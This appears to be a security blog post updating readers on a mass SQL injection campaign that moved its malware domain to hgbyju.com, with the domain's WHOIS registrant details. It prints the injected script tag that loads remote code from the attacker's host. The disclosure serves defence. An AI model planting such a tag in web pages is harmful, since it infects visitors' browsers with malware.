Nikjju SQL injection update (now hgbyju. com/r.php)

We posted a few days ago about a Mass SQL injection campaign that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju.com malware.

However, since the last two days, the attackers switched domain names and are now using hgbyju.com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:

<script src = http://hgbyju.com/r.php <</script>

This domain name was registered just a few days ago (April 17) by James Northone jamesnorthone@hotmailbox.com, same name/email used on nikjju.com and many other domains from similar malware campaigns (probably fake):

Registrant Contact:
JamesNorthone
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us

So they have been at this for a while with no sign at stopping.

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid